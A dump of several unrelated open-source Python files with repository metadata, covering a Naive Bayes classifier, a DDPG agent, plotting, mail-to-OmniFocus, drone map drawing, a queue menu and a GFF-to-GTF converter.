import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.impute import SimpleImputer
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import GaussianNB
base = pd.read_csv('credit_data.csv')
base.loc[base.age < 0, 'age'] = 40.92
previsores = base.iloc[:, 1:4].values
classe = base.iloc[:,4].values
imputer = SimpleImputer(missing_values = np.nan, strategy='mean')
imputer = imputer.fit(previsores[:,1:4])
previsores[:,1:4] = imputer.transform(previsores[:,1:4])
scaler = StandardScaler()
previsores = scaler.fit_transform(previsores)
classificador = GaussianNB()
resultados = cross_val_score(classificador, previsores, classe, cv = 10)
resultado_final = resultados.mean()
resultado_std = resultados.std()
|
[
"guilhermelamb@gmail.com"
] |
guilhermelamb@gmail.com
|
19414b707e9497314917d44fc6119c2108d592fe
|
833f76620c02f4a02a19b3a2e13b0de6b947a28a
|
/agent.py
|
cb3a86f7f5228415e5fae3aa84580b222a4b80d4
|
[] |
no_license
|
dszokolics/deepRL-continuous-control
|
0bf9af540b1cd4211da5f018a8f57fb7b6dcf0aa
|
6dfcb247fa792bcd794bf481a1cea1cb84f3a073
|
refs/heads/master
| 2023-04-27T17:18:34.014978
| 2021-05-16T10:24:16
| 2021-05-16T10:24:16
| 367,846,375
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,626
|
py
|
import numpy as np
import random
import copy
from collections import namedtuple, deque
import torch
import torch.nn.functional as F
import torch.optim as optim
from model import Actor, Critic
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Agent():
    """Interacts with and learns from the environment."""
    def __init__(self, state_size, action_size, random_seed, num_agents, agent_params):
        """Initialize an Agent object.

        Based on https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py

        Params
        ======
            state_size (int): dimension of each state
            action_size (int): dimension of each action
            random_seed (int): random seed
            num_agents (int): number of agents acting in parallel (sets the noise shape)
            agent_params (dict): hyperparameters; keys used: lr_actor, lr_critic,
                weight_decay, buffer_size, batch_size, gamma, tau, update_every,
                update_batch_number
        """
        self.state_size = state_size
        self.action_size = action_size
        self.seed = random.seed(random_seed)
        self.params = agent_params
        # Actor Network (w/ Target Network)
        self.actor_local = Actor(state_size, action_size, random_seed).to(device)
        self.actor_target = Actor(state_size, action_size, random_seed).to(device)
        self.actor_optimizer = optim.Adam(self.actor_local.parameters(), lr=self.params["lr_actor"])
        # Critic Network (w/ Target Network)
        self.critic_local = Critic(state_size, action_size, random_seed).to(device)
        self.critic_target = Critic(state_size, action_size, random_seed).to(device)
        self.critic_optimizer = optim.Adam(
            self.critic_local.parameters(), lr=self.params["lr_critic"], weight_decay=self.params["weight_decay"]
        )
        # Noise process
        self.noise = OUNoise(action_size, random_seed, num_agents)
        # Replay memory
        self.memory = ReplayBuffer(action_size, self.params["buffer_size"], self.params["batch_size"], random_seed)
        self.steps_since_last_update = 0
    def step(self, state, action, reward, next_state, done):
        """Save experience in replay memory, and use random sample from buffer to learn."""
        # Save experience / reward
        self.memory.add(state, action, reward, next_state, done)
        self.steps_since_last_update += 1
        # Learn, if enough samples are available in memory
        if len(self.memory) > self.params["batch_size"]:
            # NOTE(review): truthiness here means learning runs on every step
            # EXCEPT exact multiples of update_every (and the counter is never
            # reset) — likely inverted; `% update_every == 0` was presumably
            # intended. Confirm before changing.
            if self.steps_since_last_update % self.params["update_every"]:
                for _ in range(self.params["update_batch_number"]):
                    experiences = self.memory.sample()
                    self.learn(experiences, self.params["gamma"])
    def act(self, state, add_noise=True):
        """Returns actions for given state as per current policy."""
        state = torch.from_numpy(state).float().to(device)
        self.actor_local.eval()
        with torch.no_grad():
            action = self.actor_local(state).cpu().data.numpy()
        self.actor_local.train()
        if add_noise:
            # Ornstein-Uhlenbeck exploration noise, clipped to the action range
            action += self.noise.sample()
        return np.clip(action, -1, 1)
    def reset(self):
        """Reset the exploration noise process to its mean."""
        self.noise.reset()
    def learn(self, experiences, gamma):
        """Update policy and value parameters using given batch of experience tuples.
        Q_targets = r + γ * critic_target(next_state, actor_target(next_state))
        where:
            actor_target(state) -> action
            critic_target(state, action) -> Q-value

        Params
        ======
            experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', done) tuples
            gamma (float): discount factor
        """
        states, actions, rewards, next_states, dones = experiences
        # ---------------------------- update critic ---------------------------- #
        # Get predicted next-state actions and Q values from target models
        actions_next = self.actor_target(next_states)
        Q_targets_next = self.critic_target(next_states, actions_next)
        # Compute Q targets for current states (y_i)
        Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))
        # Compute critic loss
        Q_expected = self.critic_local(states, actions)
        critic_loss = F.mse_loss(Q_expected, Q_targets)
        # Minimize the loss
        self.critic_optimizer.zero_grad()
        critic_loss.backward()
        torch.nn.utils.clip_grad_norm_(self.critic_local.parameters(), 1)
        self.critic_optimizer.step()
        # ---------------------------- update actor ---------------------------- #
        # Compute actor loss
        actions_pred = self.actor_local(states)
        actor_loss = -self.critic_local(states, actions_pred).mean()
        # Minimize the loss
        self.actor_optimizer.zero_grad()
        actor_loss.backward()
        # NOTE(review): this clips the CRITIC's gradients during the actor
        # update — presumably a copy-paste of the line above; the actor's
        # parameters were probably intended. Confirm before changing.
        torch.nn.utils.clip_grad_norm_(self.critic_local.parameters(), 1)
        self.actor_optimizer.step()
        # ----------------------- update target networks ----------------------- #
        self.soft_update(self.critic_local, self.critic_target, self.params["tau"])
        self.soft_update(self.actor_local, self.actor_target, self.params["tau"])
    def soft_update(self, local_model, target_model, tau):
        """Soft update model parameters.
        θ_target = τ*θ_local + (1 - τ)*θ_target

        Params
        ======
            local_model: PyTorch model (weights will be copied from)
            target_model: PyTorch model (weights will be copied to)
            tau (float): interpolation parameter
        """
        for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):
            target_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)
class OUNoise:
    """Ornstein-Uhlenbeck process.

    Mean-reverting noise used for exploration; one row of noise per agent.
    https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py
    """

    def __init__(self, action_size, seed, num_agents, mu=0., theta=0.2, sigma=0.25):
        """Initialize parameters and reset the noise state to the mean."""
        self.mu = mu * np.ones((num_agents, action_size))
        self.theta = theta
        self.sigma = sigma
        self.seed = random.seed(seed)
        self.reset()

    def reset(self):
        """Reset the internal state (=noise) to mean (mu)."""
        self.state = copy.copy(self.mu)

    def sample(self):
        """Advance the process one step and return the new state."""
        drift = self.theta * (self.mu - self.state)
        diffusion = self.sigma * np.random.standard_normal(size=self.state.shape)
        self.state = self.state + drift + diffusion
        return self.state
class ReplayBuffer:
    """Fixed-capacity FIFO store of experience tuples for off-policy learning."""

    def __init__(self, action_size, buffer_size, batch_size, seed):
        """Initialize a ReplayBuffer object.

        https://github.com/udacity/deep-reinforcement-learning/blob/master/ddpg-pendulum/ddpg_agent.py

        Params
        ======
            buffer_size (int): maximum size of buffer
            batch_size (int): size of each training batch
        """
        self.action_size = action_size
        # deque(maxlen=...) silently evicts the oldest entry when full.
        self.memory = deque(maxlen=buffer_size)
        self.batch_size = batch_size
        self.experience = namedtuple("Experience", field_names=["state", "action", "reward", "next_state", "done"])
        self.seed = random.seed(seed)

    def add(self, state, action, reward, next_state, done):
        """Append one experience per agent (inputs are per-agent sequences)."""
        per_agent = zip(state, action, reward, next_state, done)
        for s, a, r, s_next, finished in per_agent:
            self.memory.append(self.experience(s, a, r, s_next, finished))

    def sample(self):
        """Draw a uniform random batch and stack it into device tensors."""
        batch = random.sample(self.memory, k=self.batch_size)

        def stack(attr):
            # vstack over non-None entries, matching the original filtering.
            return np.vstack([getattr(e, attr) for e in batch if e is not None])

        states = torch.from_numpy(stack("state")).float().to(device)
        actions = torch.from_numpy(stack("action")).float().to(device)
        rewards = torch.from_numpy(stack("reward")).float().to(device)
        next_states = torch.from_numpy(stack("next_state")).float().to(device)
        dones = torch.from_numpy(stack("done").astype(np.uint8)).float().to(device)
        return (states, actions, rewards, next_states, dones)

    def __len__(self):
        """Return the current number of stored experiences."""
        return len(self.memory)
|
[
"daniel.szokolics@gmail.com"
] |
daniel.szokolics@gmail.com
|
f37f65c77fc2cbe630313fe9779572d9243628eb
|
96aa2367affe0dff353e1aaac8713ded087c5f68
|
/utils/spiderPlot_SA.py
|
335ed09082b623795670281ed3731ae77c81e7d3
|
[
"Apache-2.0"
] |
permissive
|
NMTHydro/Recharge
|
0fcca9a72b631d6c3834c62b84dfb096da6cb210
|
bbc1a05add92064acffeffb19f04e370b99a7918
|
refs/heads/develop
| 2020-05-21T17:39:37.702622
| 2020-04-08T17:10:40
| 2020-04-08T17:10:40
| 60,631,952
| 8
| 1
| null | 2016-10-26T17:01:21
| 2016-06-07T17:13:30
|
Python
|
UTF-8
|
Python
| false
| false
| 5,333
|
py
|
# ===============================================================================
# Copyright 2016 dgketchum
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance
# with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =================================IMPORTS=======================================
import os
import matplotlib.pyplot as plt
from matplotlib import rc
from numpy import linspace, array, add, multiply, set_printoptions
from pandas import read_pickle, set_option, options
def round_to_value(number, roundto):
    """Snap *number* to the nearest multiple of *roundto*."""
    multiples = number / roundto
    return round(multiples) * roundto
# Use upright (non-italic) glyphs for mathtext in figure labels.
rc('mathtext', default='regular')

# Pandas display configuration: show complete frames at 3-decimal precision.
set_option('display.max_rows', None)
set_option('display.max_columns', None)
set_option('display.width', None)
set_option('display.precision', 3)
options.display.float_format = '${:,.2f}'.format
# Numpy printing: large threshold so arrays are not elided in console output.
set_printoptions(threshold=3000, edgeitems=5000, precision=3)
# NOTE(review): 'display.height' was removed in later pandas releases; kept
# for the legacy pandas this Python 2 script targets -- confirm before
# upgrading pandas. (A duplicate set_option('display.max_rows', None) call
# that followed this line has been removed.)
set_option('display.height', None)

# Sensitivity-analysis parameter grids.
TEMPS = range(-5, 6)  # temperature offsets, -5..+5 deg C
ALL_PCT = [x * 0.1 for x in range(5, 16)]  # multipliers 0.5..1.5
ndvi_range = linspace(0.9, 1.7, 11)
# NDVI conversion factors snapped to the nearest 0.05.
NDVI_RANGE = array([round_to_value(x, 0.05) for x in ndvi_range])
def make_spider_plot(dataframe, ndvi, all_pct, temps, fig_path=None, show=False):
    """Plot recharge-sensitivity curves for each site in the pickled results.

    Args:
        dataframe: directory holding the pickled sensitivity DataFrame(s).
        ndvi: NDVI-to-crop-coefficient conversion factors (x values for ax3).
        all_pct: parameter multipliers (0.5..1.5) for the percent-change axis.
        temps: temperature offsets in deg C (x values for ax2).
        fig_path: directory for CSV output (figure saving is commented out).
        show: if True, display each figure interactively.
    """
    # Convert multipliers (0.5..1.5) into percent change (-50..+50).
    display_pct = [(int(x)) for x in add(multiply(all_pct, 100.0), -100)]
    dfs = os.listdir(dataframe)
    print 'pickled dfs: {}'.format(dfs)
    filename = '_basic_sensitivity_2.pkl'
    if filename in dfs:
        df = read_pickle(os.path.join(dataframe, filename))
        df.to_csv(os.path.join(fig_path, 'sample_df_basic_2.csv'))
        pass
    # NOTE(review): 'df' is unbound (NameError) when the pickle is missing.
    print df
    # NOTE(review): 'xx' is never incremented, so every iteration reuses
    # matplotlib figure number 1 -- confirm whether that is intended.
    xx = 1
    for index, row in df.iterrows():
        fig = plt.figure(xx, figsize=(20, 10))
        ax1 = fig.add_subplot(111)
        # Two twin x-axes: ax2 (temperature, bottom) and ax3 (NDVI factor, top).
        ax2 = ax1.twiny()
        ax3 = ax1.twiny()
        fig.subplots_adjust(bottom=0.2)
        print 'shape temps: {}, shape row[0]: {}'.format(len(temps), len(row[0]))
        # One curve per perturbed parameter; row columns hold recharge totals.
        ax2.plot(temps, row[0], 'black', label='Temperature (+/- 5 deg C)', marker='8')
        ax1.plot(display_pct, row[1], 'blue', label='Precipitation (+/- 50%)', marker='8')
        ax1.plot(display_pct, row[2], 'purple', label='Reference Evapotranspiration (+/- 50%)', marker='8')
        ax1.plot(display_pct, row[3], 'brown', label='Total Available Water (+/- 50%)', marker='8')
        ax3.plot(ndvi, row[4], 'green', linestyle='-.', label='Normalized Density Vegetation\n'
                 ' Index Conversion Factor (0.9 - 1.8)', marker='8')
        ax1.plot(display_pct, row[5], 'red', label='Soil Hydraulic Conductivity (+/- 50%)', marker='8')
        ax1.set_xlabel(r"Parameter Change (%)", fontsize=16)
        ax1.set_ylabel(r"Total Recharge in 14-Year Simulation (mm)", fontsize=16)
        ax2.set_xlabel(r"Temperature Change (C)", fontsize=16)
        # Push the temperature axis below the main percent axis.
        ax2.xaxis.set_ticks_position("bottom")
        ax2.xaxis.set_label_position("bottom")
        ax2.spines["bottom"].set_position(("axes", -0.15))
        ax2.set_frame_on(True)
        ax2.patch.set_visible(False)
        # Hide all spines except the relocated bottom one (py2 itervalues).
        for sp in ax2.spines.itervalues():
            sp.set_visible(False)
        ax2.spines['bottom'].set_visible(True)
        ax3.set_xlabel(r"NDVI to Crop Coefficient Conversion Factor", fontsize=16)
        ax3.xaxis.set_ticks_position("top")
        ax3.xaxis.set_label_position("top")
        # ax3.spines["top"].set_position(("axes", 1.0))
        ax3.set_frame_on(True)
        ax3.patch.set_visible(False)
        for sp in ax3.spines.itervalues():
            sp.set_visible(False)
        ax3.spines['top'].set_visible(True)
        plt.title('Variation of ETRM Pysical Parameters at {}'.format(str(index).replace('_', ' ')),
                  y=1.08, fontsize=20)
        # Merge legend entries from all three axes into one legend box.
        handle1, label1 = ax1.get_legend_handles_labels()
        handle2, label2 = ax2.get_legend_handles_labels()
        handle3, label3 = ax3.get_legend_handles_labels()
        handles, labels = handle1 + handle2 + handle3, label1 + label2 + label3
        ax1.legend(handles, labels, loc=0)
        if show:
            plt.show()
        # if fig_path:
        #     plt.savefig(os.path.join(fig_path, '{}_spider'.format(index)), dpi=600, ext='jpg', close=True,
        #                 verbose=True)
        plt.close(fig)
if __name__ == '__main__':
    # Windows drive layout of the ETRM sensitivity-analysis workspace.
    root = os.path.join('F:\\', 'ETRM_Inputs')
    sensitivity = os.path.join(root, 'sensitivity_analysis')
    pickles = os.path.join(sensitivity, 'pickled')
    figure_save_path = os.path.join(sensitivity, 'figures')
    make_spider_plot(pickles, NDVI_RANGE, ALL_PCT, TEMPS, figure_save_path, show=True)
# ========================== EOF ==============================================
|
[
"dgketchum@gmail.com"
] |
dgketchum@gmail.com
|
bcb16b3b56244d6ba5fc6daf20ec87ed4180b1ca
|
256afbb25a57bdc54b2c3e3e3fc7832c31c8467f
|
/mutt-to-omnifocus.py
|
224765e49122746dd7328bb35dbb13f24b8b17d3
|
[] |
no_license
|
jeauxlb/mutt-to-omnifocus
|
a3b3ba29ff83220c1ce5f52ba351d44e6bad3ac7
|
5d19b109057eeaad1c600c4e0d5dccc952a03546
|
refs/heads/master
| 2021-01-19T08:26:52.169184
| 2019-11-03T13:02:26
| 2019-11-03T13:02:26
| 87,630,521
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,832
|
py
|
#!/usr/bin/env python
import sys
import os
import getopt
import email.parser
import subprocess
from email.header import decode_header
def usage():
    # Print the command-line help text to stdout. Note: the triple-quoted
    # text is the *argument* of a Python 2 print statement, not a docstring.
    print """
Take an RFC-compliant e-mail message on STDIN and add a
corresponding task to the OmniFocus inbox for it.
Options:
-h, --help
Display this help text.
-q, --quick-entry
Use the quick entry panel instead of directly creating a task.
"""
def applescript_escape(string):
    """Escape backslashes and double quotes for embedding in AppleScript.

    A None input (missing header) is passed through unchanged.
    """
    if string is None:
        return string
    # Backslashes first, otherwise the escapes themselves get re-escaped.
    escaped = string.replace('\\', '\\\\')
    return escaped.replace('"', '\\"')
def parse_message(raw):
    """Parse a string containing an e-mail and produce a list containing the
    significant headers. Each element is a tuple containing the name and
    content of the header (list of tuples rather than dictionary to preserve
    order).
    """
    # Headers only; the message body is irrelevant for the task note.
    message = email.parser.Parser().parsestr(raw, headersonly=True)
    # Extract relevant headers
    list = [("Date", message.get("Date")),
            ("From", message.get("From")),
            # ("Subject", message.get("Subject")),
            ("Message-ID", message.get("Message-ID"))]
    try:
        # Subject may be RFC 2047 encoded; only the first decoded chunk is used.
        sub, encoding = decode_header(message.get("Subject"))[0]
        sub = sub.replace('\n', '');
        # NOTE(review): pipes the subject through a user-specific external
        # script (hard-coded absolute path) to build the task name -- this
        # will fail on other machines; confirm intent.
        pipe = subprocess.Popen(['/Users/joel/bin/item_name.sh', sub], stdout=subprocess.PIPE)
        subject, error = pipe.communicate()
        list.append(["Subject", subject.rstrip('\n')])
    except KeyboardInterrupt:
        # Ctrl-C during the subprocess call aborts the whole script.
        print ""
        sys.exit()
    return list
def send_to_omnifocus(params, quickentry=False):
    """Take the list of significant headers and create an OmniFocus inbox item
    from these.

    params is the (name, value) list from parse_message(); quickentry selects
    the interactive quick-entry panel instead of silently creating the task.
    """
    # name and note of the task (escaped as per applescript_escape())
    name = "%s" % applescript_escape(dict(params)["Subject"])
    note = "\n".join(["%s: %s" % (k, applescript_escape(v)) for (k, v) in params])
    # Write the Applescript
    if quickentry:
        applescript = """
tell application "OmniFocus"
tell default document
tell quick entry
open
make new inbox task with properties {name: "%s", note:"%s"}
select tree 1
set note expanded of tree 1 to true
end tell
end tell
end tell
""" % (name, note)
    else:
        applescript = """
tell application "OmniFocus"
tell default document
make new inbox task with properties {name: "%s", note:"%s"}
end tell
end tell
""" % (name, note)
    # Use osascript and a heredoc to run this Applescript
    # NOTE(review): name/note are AppleScript-escaped but not shell-escaped;
    # the heredoc keeps them out of shell syntax, but a subject containing a
    # line reading 'EOT' would break it -- confirm acceptable.
    os.system("\n".join(["osascript >/dev/null << EOT", applescript, "EOT"]))
def main():
    """Entry point: parse CLI flags, read the mail from stdin, file the task."""
    # Check for options
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hq", ["help", "quick-entry"])
    except getopt.GetoptError:
        usage()
        sys.exit(-1)
    # If an option was specified, do the right thing
    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit(0)
        elif opt in ("-q", "--quick-entry"):
            # Quick-entry mode: read the message and open the panel.
            raw = sys.stdin.read()
            send_to_omnifocus(parse_message(raw), quickentry=True)
            sys.exit(0)
    # Otherwise fall back to standard operation
    raw = sys.stdin.read()
    send_to_omnifocus(parse_message(raw), quickentry=False)
    sys.exit(0)
if __name__ == "__main__":
    main()  # script entry point when run directly (e.g. from mutt)
|
[
"github@spam.joelbuckley.com.au"
] |
github@spam.joelbuckley.com.au
|
b5dd9c0170e9576edc3884cda967bd39951aad8f
|
13fa6b903547618d567c3284b9dc637024800947
|
/Código-fonte/navigation/SLAM/map_view.py
|
0d40fc571f4a21cc1956f3e290760dd3e68519b6
|
[] |
no_license
|
EvoSystems-com-br/IniciacaoCientifica2018_ProjetoDrones
|
cc5a8a91dbc007cad85000a31465ed3950980bd1
|
8af0ca6930b326ae7bc0cd7bb9aa2d6aa62bceeb
|
refs/heads/master
| 2020-03-26T11:49:31.933492
| 2018-10-30T19:41:16
| 2018-10-30T19:41:16
| 144,861,611
| 0
| 3
| null | 2018-10-30T19:41:19
| 2018-08-15T14:11:58
|
Python
|
UTF-8
|
Python
| false
| false
| 2,335
|
py
|
import cv2
import time
import math
import numpy as np
PIXEL_RATE = 1.75   # pixels per centimetre when mapping world coords to the image
OFFSET_X = 60       # x pixel offset of the map origin
OFFSET_Y = 50       # y pixel offset of the map origin
RANGE_Y = 150       # world-space y extent (cm); used to flip the y axis
CIRCLE_RADIO = 15   # drone marker radius in pixels
MARKER_SIZE = 20    # drawn marker segment length in pixels
class MapView():
    """Top-down 2D map renderer (OpenCV) for the drone pose and SLAM markers."""

    def __init__(self):
        # Background schematic of the flight area, resized to the map canvas.
        self.esquema = cv2.imread("data/esquema.png")
        self.esquema = cv2.resize(self.esquema, (480, 360))
        # Drone sprite; loaded but the pose is actually drawn as circle+triangle.
        self.drone = cv2.imread("data/drone.png")
        self.drone = cv2.resize(self.drone, (48, 36))
        # Initial pose: x=50 cm, y=0 cm, heading alpha=180 degrees.
        self.updateMap([[50], [0],[180]])

    def updateMap(self, X):
        """Redraw the map from the state column-vector X.

        X layout: [[x], [y], [alpha], [x1], [y1], [beta1], ...] where each
        trailing triple describes one landmark marker (cm, cm, degrees).
        """
        self.map = self.esquema.copy()
        self.drawDrone(X[0][0], X[1][0], X[2][0])
        # Every group of three entries after the pose is one marker.
        n_marker = int((len(X)/3) - 1)
        for i in range(n_marker):
            x1 = X[3+3*i][0]
            y1 = X[4+3*i][0]
            beta = X[5+3*i][0] *3.14/180  # degrees -> radians (pi approximated as 3.14)
            # Second endpoint of the marker segment along its orientation.
            x2 = x1 - MARKER_SIZE*math.sin(beta)
            y2 = y1 + MARKER_SIZE*math.cos(beta)
            # Convert cm coordinates to pixel coordinates (y axis flipped).
            coord_x1 = int(OFFSET_X + x1*PIXEL_RATE)
            coord_y1 = int(OFFSET_Y + (RANGE_Y-y1)*PIXEL_RATE)
            coord_x2 = int(OFFSET_X + x2*PIXEL_RATE)
            coord_y2 = int(OFFSET_Y + (RANGE_Y-y2)*PIXEL_RATE)
            # Draw the marker as a thick line segment (BGR colour 19,69,139).
            self.map = cv2.line(self.map, (coord_x1, coord_y1),
                                (coord_x2, coord_y2), (19, 69,139), 5)

    def drawDrone(self, x, y, alpha):
        """Draw the drone: a filled disc plus a triangle showing heading alpha."""
        # Convert cm coordinates to pixel coordinates (y axis flipped).
        coord_x = int(OFFSET_X + x*PIXEL_RATE)
        coord_y = int(OFFSET_Y + (RANGE_Y-y)*PIXEL_RATE)
        cv2.circle(self.map, (coord_x, coord_y), CIRCLE_RADIO, (255, 0, 0), -1)
        # Draw the drone's orientation as a triangle pointing along alpha
        # (image y grows downward, hence the minus on the sin terms).
        p1_x = coord_x + CIRCLE_RADIO*math.cos((alpha+30)*3.14/180)
        p1_y = coord_y - CIRCLE_RADIO*math.sin((alpha+30)*3.14/180)
        p2_x = coord_x + CIRCLE_RADIO*math.cos((alpha-30)*3.14/180)
        p2_y = coord_y - CIRCLE_RADIO*math.sin((alpha-30)*3.14/180)
        p3_x = coord_x + 2*CIRCLE_RADIO*math.cos((alpha)*3.14/180)
        p3_y = coord_y - 2*CIRCLE_RADIO*math.sin((alpha)*3.14/180)
        pts = np.array([[p1_x, p1_y],[p2_x,p2_y],[p3_x,p3_y]], np.int32)
        pts = pts.reshape((-1,1,2))
        cv2.fillPoly(self.map,[pts],(255,0,0))

    def showMap(self):
        """Display the map in a window until the user presses 'q'."""
        while(True):
            cv2.imshow("mapa", self.map)
            if cv2.waitKey(100) & 0xFF == ord('q'):
                break
|
[
"leonardotkimura@gmail.com"
] |
leonardotkimura@gmail.com
|
4278e7b7f4ccb1865e1fc8e2c19350fb3bfb8177
|
2556d0bed5e90489ec8c93ad033db00b235e3de0
|
/main.py
|
e5979e99101b749dfa72a25e15f20ec0069e877e
|
[] |
no_license
|
weichih654/movie_review
|
dd08392d029c3d7614178e5c49e97b6c973f659b
|
47fabf41262318568bd7dbcafb34e0acb531b674
|
refs/heads/master
| 2021-01-10T02:14:22.864684
| 2016-03-21T11:01:23
| 2016-03-21T11:01:23
| 49,113,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
from libs.movie_review import MovieReview
from libs.review_searcher import ReviewSeacher
from libs.matcher import Matcher
if __name__ == "__main__":
searcher = ReviewSeacher("test")
reviews = []
reviews = searcher.reviews
for r in reviews:
review = MovieReview(r)
print "link = " + r
print "content = " + review.content
|
[
"weichih654@gmail.com"
] |
weichih654@gmail.com
|
42d0987e6e1898a0e5f60a297e7db42a013fab6d
|
bcf332d2f6ef6970cfaa480400a112ecee3f16b8
|
/stage07-artist2/s1level42.py
|
c5f34c2ae0814db387a0d43027c8ee7cd714f9b1
|
[
"Unlicense"
] |
permissive
|
skilstak/code-dot-org-python
|
e1907d29f3727060e5064a5eefd68a0f9f4f5c70
|
ba127124386ecfdc20bd84592b3c271f8205d748
|
refs/heads/master
| 2020-04-04T19:34:23.531210
| 2015-07-10T12:39:19
| 2015-07-10T12:39:19
| 26,862,410
| 7
| 4
| null | 2014-11-21T20:28:20
| 2014-11-19T13:24:30
|
Python
|
UTF-8
|
Python
| false
| false
| 465
|
py
|
"""Stage 7: Puzzle 8 of 11
Here's the solution to the previous puzzle. Can you add just 2 more
lines of code to complete the drawing?
"""
import sys
sys.path.append('..')  # make the shared codestudio package importable
import codestudio

# Load the puzzle canvas and speed up the turtle-style artist.
artist = codestudio.load('s1level42')
artist.speed = 'faster'
a = artist  # short alias kept for the lesson's starter snippets
# Draw ten 20x20 squares, each in a fresh random colour, stepping
# forward 20 between squares.
for count2 in range(10):
    artist.color = artist.random_color()
    for count in range(4):
        artist.move_forward(20)
        artist.turn_right(90)
    artist.move_forward(20)
artist.check()  # verify the drawing against the puzzle's expected solution
|
[
"rob@skilstak.com"
] |
rob@skilstak.com
|
d022c401cac71d8aef3ec744f424139b4bfc884d
|
88ca4006c4d624320002c3f939f27e2ba3a59a5a
|
/ch6_queue.py
|
53936cf17d2c92ec70739941c09ef32b7b45e402
|
[] |
no_license
|
sunice/PythonPractice
|
28dcf2bb5666f19e538c31783063f65b830ba7c3
|
64a4feb354fd84f64e193a8c5e62364fb50541bc
|
refs/heads/master
| 2016-09-06T12:50:51.491985
| 2015-05-25T00:49:51
| 2015-05-25T00:49:51
| 35,148,274
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 712
|
py
|
queue = []
def enQ():
    # Prompt for a string and append it to the tail of the shared queue
    # (raw_input is Python 2).
    queue.append(raw_input(' Enter New string: ').strip())
def deQ():
    # Remove and report the item at the head of the queue (FIFO order).
    if len(queue) == 0:
        print 'Cannot pop from an empty queue!'
    else:
        # Backquotes are the legacy Python 2 shorthand for repr().
        print 'Removed [', `queue.pop(0)`, ']'
def viewQ():
    # Show the current queue contents without modifying them.
    print queue
CMDs = {'e': enQ, 'd': deQ, 'v': viewQ}
def showmenu():
    # Interactive loop: read a menu letter and dispatch via the CMDs table.
    pr = """
(E)nqueue
(D)equeue
(V)iew
(Q)uit
Enter choice: """
    while True:
        # Inner loop: keep prompting until a valid letter is entered.
        while True:
            try:
                choice = raw_input(pr).strip()[0].lower()
            except (EOFError, KeyboardInterrupt, IndexError):
                # EOF, Ctrl-C, or empty input all count as "quit".
                choice = 'q'
            print '\nYou picked: [%s]' % choice
            if choice not in 'devq':
                print 'Invalid option, try again'
            else:
                break
        if choice == 'q':
            break
        # Dispatch to the handler bound to this menu letter.
        CMDs[choice]()
if __name__ == '__main__':
    showmenu()  # run the interactive menu when executed as a script
|
[
"izhang@microstrategy.com"
] |
izhang@microstrategy.com
|
6ab95716a6bff065c2b13765723aee7964f0a87a
|
ef25f5fe6b74e2c84dd299de2e23c3487f9b0746
|
/python_exc/gff_to_gtf.py
|
8b9f067f870b1ab50db3376e17259da74df17ba1
|
[] |
no_license
|
feifei/python
|
32da1cb18ce19a05a62fc334ba4aab902b2cd0af
|
f0eaa69d5ca011e3075f9af56ef3aa756178e5e3
|
refs/heads/main
| 2023-05-30T19:14:06.132356
| 2021-06-04T13:45:03
| 2021-06-04T13:45:03
| 342,535,711
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,515
|
py
|
#!/usr/bin/env python
''' Convert GFF3 file to GTF,
only tested on EupathDB output, which is not a standard GFF3 file
'''
import os, re
import argparse
parser = argparse.ArgumentParser(description='Convert gff3 file to gtf file')
parser.add_argument('gff_file')
args = parser.parse_args()

gff_file = args.gff_file
# Output file: same basename with the extension swapped to .gtf.
basename, extension = os.path.splitext(gff_file)
gtf_file = basename + ".gtf"

with open (gff_file, 'r') as inh, open(gtf_file, 'w') as outh:
    for line in inh:
        # Skip comment/pragma lines.
        if line.startswith("#"):
            continue
        # Tab-separated columns: seqid, source, type, start, end, score,
        # strand, phase, attributes.
        scfid, source, feature, start, end, score, strand, frame, attr = line.split("\t")
        if feature == "gene":
            gene_id = re.match("ID=(.*?);", attr).group(1)
            new_attr = "gene_id \"%s\";" %gene_id
            # Synthesize one transcript id per gene.
            transcript_id = gene_id + "_t"
        elif feature == "exon":
            # NOTE(review): relies on a preceding 'gene' line having set
            # gene_id/transcript_id; an exon appearing first raises NameError.
            exon_id = re.match("ID=(.*?);", attr).group(1)
            # Exon number is the trailing -N suffix of the exon id.
            exon_number = re.search("-(\d+)$", exon_id).group(1)
            new_attr = "gene_id \"%s\"; transcript_id \"%s\"; exon_number \"%s\"; exon_id \"%s\";" %(gene_id, transcript_id, exon_number, exon_id)
        else:
            # All other feature types are dropped.
            continue
        # Python 2 "print >> file" redirection.
        print >>outh, "\t".join([scfid, source, feature, start, end, score, strand, frame, new_attr])
        if feature == "gene":
            # Also emit a companion 'transcript' row spanning the gene.
            new_attr = "gene_id \"%s\"; transcript_id \"%s\";" %(gene_id, transcript_id)
            print >>outh, "\t".join([scfid, source, "transcript", start, end, score, strand, frame, new_attr])
|
[
"feifei.xu@ebc.uu.se"
] |
feifei.xu@ebc.uu.se
|
9592e0575d2287aeb96b002e0a67d11474e08684
|
b83e9ded5aa46bf7c79a6cbce8a239a4ca0b38ba
|
/tests/utils_test.py
|
d4794967907dc4fe9f079e14a39ef5e15d4c4884
|
[
"Apache-2.0"
] |
permissive
|
pnickl/neural-tangents
|
55cb2800dc8067fff5024e995fbe953070f41905
|
79a47a60b5dd00d03c5ae5f9edb44ca66463fc1c
|
